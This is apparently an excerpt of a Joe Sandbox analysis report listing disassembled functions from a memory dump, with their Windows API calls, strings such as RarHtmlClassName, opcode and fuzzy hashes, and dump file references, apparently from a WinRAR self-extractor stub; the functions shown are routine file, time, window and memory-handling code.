                                                                                                                                          • Instruction ID: b0a15b137479d29289eb3eb14b17fc378d95a079f7a6eb274163ae447cc309b1
                                                                                                                                          • Opcode Fuzzy Hash: e39526699e00b23eb14e4cb4f30cf1bc21b95fe5c2bf82dbd2581def69227268
                                                                                                                                          • Instruction Fuzzy Hash: 3241F571A0021EABCB10DF64C845BFEBBE9EF48710F10823AFA15E7A91D774994097E4
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: H_prolog
                                                                                                                                          • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                                                          • API String ID: 3519838083-3505469590
                                                                                                                                          • Opcode ID: 1472796a2bdad332e220c407af910d7f02337ff64b4c4f9fb73c59008eb753b8
                                                                                                                                          • Instruction ID: 4beacac246e3f0b682ea46a1e09d9a53c55666ccc5af2a599b30fba49abba173
                                                                                                                                          • Opcode Fuzzy Hash: 1472796a2bdad332e220c407af910d7f02337ff64b4c4f9fb73c59008eb753b8
                                                                                                                                          • Instruction Fuzzy Hash: 33717C70B00659AFDB18DFA5CC959AFBBB9FF49310B14416DE512B72A0CB30AD41CB60
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • __EH_prolog.LIBCMT ref: 000E9387
                                                                                                                                          • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 000E93AA
                                                                                                                                          • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 000E93C9
                                                                                                                                            • Part of subcall function 000EC29A: _wcslen.LIBCMT ref: 000EC2A2
                                                                                                                                            • Part of subcall function 000F1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,000EC116,00000000,.exe,?,?,00000800,?,?,?,000F8E3C), ref: 000F1FD1
                                                                                                                                          • _swprintf.LIBCMT ref: 000E9465
                                                                                                                                            • Part of subcall function 000E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000E40A5
                                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 000E94D4
                                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 000E9514
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                                                          • String ID: rtmp%d
                                                                                                                                          • API String ID: 3726343395-3303766350
                                                                                                                                          • Opcode ID: e26573ea50d8bb8cf6ece17622feb726b1188504e100ce485d06f512628076b2
                                                                                                                                          • Instruction ID: f2c4fc3d356866669f170149306693de81e8c06771cbba34bc5137ffd6677f26
                                                                                                                                          • Opcode Fuzzy Hash: e26573ea50d8bb8cf6ece17622feb726b1188504e100ce485d06f512628076b2
                                                                                                                                          • Instruction Fuzzy Hash: 9E4168B2900299ADDF61EB61CD45DEE73BCAF45340F0048A5B659F3053DB389BC99B60
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • __aulldiv.LIBCMT ref: 000F122E
                                                                                                                                            • Part of subcall function 000EB146: GetVersionExW.KERNEL32(?), ref: 000EB16B
                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 000F1251
                                                                                                                                          • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 000F1263
                                                                                                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 000F1274
                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 000F1284
                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 000F1294
                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 000F12CF
                                                                                                                                          • __aullrem.LIBCMT ref: 000F1379
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1247370737-0
                                                                                                                                          • Opcode ID: 6f80c847b760e66bb26525b8c5c83c092be34af051e6bbe0d2c5cbe83373109f
                                                                                                                                          • Instruction ID: 3ba4bd8657dd4225a7680de525eb53968591282f4e838f978a5379ce8679fc95
                                                                                                                                          • Opcode Fuzzy Hash: 6f80c847b760e66bb26525b8c5c83c092be34af051e6bbe0d2c5cbe83373109f
                                                                                                                                          • Instruction Fuzzy Hash: 804116B1508305AFC754DF65C8849ABFBE9FF88314F04892EF696C2610E734E649DB52
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • _swprintf.LIBCMT ref: 000E2536
                                                                                                                                            • Part of subcall function 000E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000E40A5
                                                                                                                                            • Part of subcall function 000F05DA: _wcslen.LIBCMT ref: 000F05E0
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                                                                          • String ID: ;%u$x%u$xc%u
                                                                                                                                          • API String ID: 3053425827-2277559157
                                                                                                                                          • Opcode ID: 42867000ca51823bf718efaecf09aad58a28560c458ccf939e9fbed2b0ac7f25
                                                                                                                                          • Instruction ID: e1d6e0a9d606aab49dbffd45619426177552d9ababc5aecc2d882deeb863305c
                                                                                                                                          • Opcode Fuzzy Hash: 42867000ca51823bf718efaecf09aad58a28560c458ccf939e9fbed2b0ac7f25
                                                                                                                                          • Instruction Fuzzy Hash: E4F147716043C09FDB25EB268995BFE77DE6F90300F08056DED86BB283CB619946C762
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _wcslen
                                                                                                                                          • String ID: </p>$</style>$<br>$<style>$>
                                                                                                                                          • API String ID: 176396367-3568243669
                                                                                                                                          • Opcode ID: c0a160a543ab55e2d6a332b77fcff5069f9b61a5d4ab18fbd7f48ff063bce2cb
                                                                                                                                          • Instruction ID: 78a5fdd6e1131c4b8854082c35033097c689c4659fdd8f5362f572acdea54531
                                                                                                                                          • Opcode Fuzzy Hash: c0a160a543ab55e2d6a332b77fcff5069f9b61a5d4ab18fbd7f48ff063bce2cb
                                                                                                                                          • Instruction Fuzzy Hash: 22517B66B0032B95DB709A659C117B673E0DFA0750F79042BFFC18B9C0FBA58C81E261
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0010FE02,00000000,00000000,00000000,00000000,00000000,0010529F), ref: 0010F6CF
                                                                                                                                          • __fassign.LIBCMT ref: 0010F74A
                                                                                                                                          • __fassign.LIBCMT ref: 0010F765
                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0010F78B
                                                                                                                                          • WriteFile.KERNEL32(?,00000000,00000000,0010FE02,00000000,?,?,?,?,?,?,?,?,?,0010FE02,00000000), ref: 0010F7AA
                                                                                                                                          • WriteFile.KERNEL32(?,00000000,00000001,0010FE02,00000000,?,?,?,?,?,?,?,?,?,0010FE02,00000000), ref: 0010F7E3
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                          • Opcode ID: bfe10e206da50fc9f45cac83ebb0ba3474feca1277041f30565f3f15f20b92d7
                                                                                                                                          • Instruction ID: 7e3c8f91b600b9904949057d0544f57a11c66ab8c2a68faf93a2f384940bc385
                                                                                                                                          • Opcode Fuzzy Hash: bfe10e206da50fc9f45cac83ebb0ba3474feca1277041f30565f3f15f20b92d7
                                                                                                                                          • Instruction Fuzzy Hash: 5751A7B5E002499FCB14CFA4DC55AEEBBF4EF09300F14816EE595E7691D770A941CBA0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00102937
                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0010293F
                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 001029C8
                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 001029F3
                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00102A48
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                          • String ID: csm
                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                          • Opcode ID: 3319d8adad8ec966c3b3934b0b53fea53fe7cd1bb663e12ed37caa1a0c12a12f
                                                                                                                                          • Instruction ID: 086d2dfe45c1d786c1d1f9296af3a75697226beaf18069c9e69989eb0c9168f3
                                                                                                                                          • Opcode Fuzzy Hash: 3319d8adad8ec966c3b3934b0b53fea53fe7cd1bb663e12ed37caa1a0c12a12f
                                                                                                                                          • Instruction Fuzzy Hash: B641C534A00218EFCF14DF68C889ADEBBF5AF44328F148055E895AB3D2D7B1DA51CB90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 000F9EEE
                                                                                                                                          • GetWindowRect.USER32(?,00000000), ref: 000F9F44
                                                                                                                                          • ShowWindow.USER32(?,00000005,00000000), ref: 000F9FDB
                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 000F9FE3
                                                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 000F9FF9
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Window$Show$RectText
                                                                                                                                          • String ID: RarHtmlClassName
                                                                                                                                          • API String ID: 3937224194-1658105358
                                                                                                                                          • Opcode ID: 1975594bd6604fd8f8e2be3a5cf8459856237fc0b1ea7fb33988e491da8ca171
                                                                                                                                          • Instruction ID: 54fc6242f7078fea3221cc1da78714994d95da2aa3288150992e132416715588
                                                                                                                                          • Opcode Fuzzy Hash: 1975594bd6604fd8f8e2be3a5cf8459856237fc0b1ea7fb33988e491da8ca171
                                                                                                                                          • Instruction Fuzzy Hash: 84410471104314EFCB615F64DC48F6BBBA8FF49B01F008568FA5A994A2CB34E948DF61
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _wcslen
                                                                                                                                          • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                                          • API String ID: 176396367-3743748572
                                                                                                                                          • Opcode ID: 9a395e65f7b615e1ca9d797b10e2e922f43ad2228fd038ff9368c07af519ee8a
                                                                                                                                          • Instruction ID: 2f3e35bf12ed474b351e9083a12c1b0de098677693e68c782e1b067d4434c221
                                                                                                                                          • Opcode Fuzzy Hash: 9a395e65f7b615e1ca9d797b10e2e922f43ad2228fd038ff9368c07af519ee8a
                                                                                                                                          • Instruction Fuzzy Hash: 4231C43264430956D634AF549C02B7B73E4EB90720F60442FF6D2472C0FBD1AD8093E2
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 0010C868: _free.LIBCMT ref: 0010C891
                                                                                                                                          • _free.LIBCMT ref: 0010C8F2
                                                                                                                                            • Part of subcall function 00108DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0010C896,?,00000000,?,00000000,?,0010C8BD,?,00000007,?,?,0010CCBA,?), ref: 00108DE2
                                                                                                                                            • Part of subcall function 00108DCC: GetLastError.KERNEL32(?,?,0010C896,?,00000000,?,00000000,?,0010C8BD,?,00000007,?,?,0010CCBA,?,?), ref: 00108DF4
                                                                                                                                          • _free.LIBCMT ref: 0010C8FD
                                                                                                                                          • _free.LIBCMT ref: 0010C908
                                                                                                                                          • _free.LIBCMT ref: 0010C95C
                                                                                                                                          • _free.LIBCMT ref: 0010C967
                                                                                                                                          • _free.LIBCMT ref: 0010C972
                                                                                                                                          • _free.LIBCMT ref: 0010C97D
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                          • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                                          • Instruction ID: 63c310ebffe47dcccc7682a68f13d90b88e7e13bcb9a28151a88c95d78f92bdc
                                                                                                                                          • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                                          • Instruction Fuzzy Hash: 09112171594B09AAE520B7B1CC07FCB7BAC9F28B00F408E16B2DD660D2DBF5B5058B94
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,000FE669,000FE5CC,000FE86D), ref: 000FE605
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 000FE61B
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 000FE630
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                          • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                          • API String ID: 667068680-1718035505
                                                                                                                                          • Opcode ID: 5e55ed875849606c7724322ce75cc3dbc471d73f3b54819fbed0fb156313be0a
                                                                                                                                          • Instruction ID: 9d438a3d23a567b27d083be95c36965ed5adc9cee7ba2b5801c5c8047bc789ca
                                                                                                                                          • Opcode Fuzzy Hash: 5e55ed875849606c7724322ce75cc3dbc471d73f3b54819fbed0fb156313be0a
                                                                                                                                          • Instruction Fuzzy Hash: 21F0C2317807AEAB4BA14E64DD845BA23CA6B2A7D1304443AEB05D7D30EB14CCD17B90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 000F14C2
                                                                                                                                            • Part of subcall function 000EB146: GetVersionExW.KERNEL32(?), ref: 000EB16B
                                                                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000F14E6
                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 000F1500
                                                                                                                                          • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 000F1513
                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 000F1523
                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 000F1533
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2092733347-0
                                                                                                                                          • Opcode ID: 5b692cf2fb866007877d78f5b1fc62d73ede575ad3cbaa2ccd64d5fa1c4c39ce
                                                                                                                                          • Instruction ID: 6ec152f46ee3eee81b602dee1a70fef0bb5830637beb3fa2acd5611759fa0554
                                                                                                                                          • Opcode Fuzzy Hash: 5b692cf2fb866007877d78f5b1fc62d73ede575ad3cbaa2ccd64d5fa1c4c39ce
                                                                                                                                          • Instruction Fuzzy Hash: E731E875208345AFC704DFA8C98499BBBF8BF98754F048A1EF995C3610E730D549CBA6
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetLastError.KERNEL32(?,?,00102AF1,001002FC,000FFA34), ref: 00102B08
                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00102B16
                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00102B2F
                                                                                                                                          • SetLastError.KERNEL32(00000000,00102AF1,001002FC,000FFA34), ref: 00102B81
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
